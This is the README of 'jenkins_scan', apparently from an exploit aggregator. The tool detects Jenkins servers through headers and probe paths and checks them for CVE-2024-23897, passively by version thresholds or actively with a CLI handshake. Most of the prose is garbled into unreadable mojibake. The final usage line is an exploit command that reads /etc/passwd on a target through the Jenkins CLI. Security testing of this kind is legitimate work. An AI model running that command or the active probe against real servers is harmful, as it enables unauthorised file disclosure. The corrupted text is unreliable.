## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-W41L3R-JENKINS_SCAN
# jenkins_scan
рдЬреЗрдирдХрд┐рдВрд╕ рд╡рд╛рддрд╛рд╡рд░рдг рдЦреЛрдЬреЗрдВ рдФрд░ CVE-2024-23897 рдХреА рдЬрд╛рдБрдЪ рдХрд░реЗрдВ
## рдпрд╣ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ
### рдЬреЗрдирдХрд┐рдВрд╕ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдирд╛
рдкрдереЛрдВ рдХрд╛ рдкрд░реАрдХреНрд╖рдг: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json
рдЗрд╕рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкрд╣рдЪрд╛рдирддрд╛ рд╣реИ:
1. Header X-Jenkins тАФ рдЕрдзрд┐рдХ рд╡рд┐рд╢реНрд╡рд╕рдиреАрдп, рд╕рдВрд╕реНрдХрд░рдг рднреА рд▓реМрдЯрд╛рддрд╛ рд╣реИ
2. Header X-Hudson тАФ рдкреБрд░рд╛рдиреЗ рдЙрджрд╛рд╣рд░рдг
3. Body HTML тАФ рд╕реНрдЯреНрд░рд┐рдВрдЧреНрд╕ рдЬреИрд╕реЗ "login to jenkins", "hudson.model", рдЖрджрд┐ред
4. /api/json тАФ JSON рд╕рдВрд░рдЪрдирд╛ (_class, jobs, views) рд╕реЗ рдкреБрд╖реНрдЯрд┐ рдХрд░рддрд╛ рд╣реИ
### CVE-2024-23897 рдХреА рдЬрд╛рдБрдЪ
рдирд┐рд╖реНрдХреНрд░рд┐рдп (рдбрд┐рдлрд╝реЙрд▓реНрдЯ): рдкрддрд╛ рд▓рдЧрд╛рдП рдЧрдП рд╕рдВрд╕реНрдХрд░рдг рдХреА thresholds рд╕реЗ рддреБрд▓рдирд╛ рдХрд░рддрд╛ рд╣реИ:
* Weekly: < 2.442 тЖТ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд
* LTS: < 2.426.3 тЖТ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд
рд╕рдХреНрд░рд┐рдп (--active): HTTP рдкрд░ Jenkins CLI рдХреЗ рдмрд╛рдЗрдирд░реА рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рд╣реИрдВрдбрд╢реЗрдХ рднреЗрдЬрддрд╛ рд╣реИред рдпрджрд┐ рд╕рд░реНрд╡рд░ 200 + Content-Type: application/octet-stream рдХреЗ рд╕рд╛рде рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдХрд░рддрд╛ рд╣реИ, рддреЛ рдпрд╣ рдкреБрд╖реНрдЯрд┐ рдХрд░рддрд╛ рд╣реИ рдХрд┐ CLI рдЪреИрдирд▓ рдЦреБрд▓рд╛ рд╣реИ рдФрд░ exploit рд▓рд╛рдЧреВ рд╣реИред
## рдЙрдкрдпреЛрдЧ
### рдмреБрдирд┐рдпрд╛рджреА рд╕реНрдХреИрди
python jenkins_scan.py -f urls.txt
### рд╕рдХреНрд░рд┐рдп рдкреНрд░реЛрдм + Burp рдкреНрд░реЙрдХреНрд╕реА рдХреЗ рд░реВрдк рдореЗрдВ + рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдЖрдЙрдЯрдкреБрдЯ
python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt
### 20 рдереНрд░реЗрдб, рд╡рд░реНрдмреЛрдЬрд╝, рдмрд┐рдирд╛ рд░рдВрдЧ (pipe/grep рдХреЗ рд▓рд┐рдП)
python jenkins_scan.py -f urls.txt -t 20 -v --no-color
### рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд▓рдХреНрд╖реНрдп рдкрд░ рдореИрдиреНрдпреБрдЕрд▓ рд░реВрдк рд╕реЗ exploit рдХреА рдкреБрд╖реНрдЯрд┐ рдХрд░реЗрдВ
java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"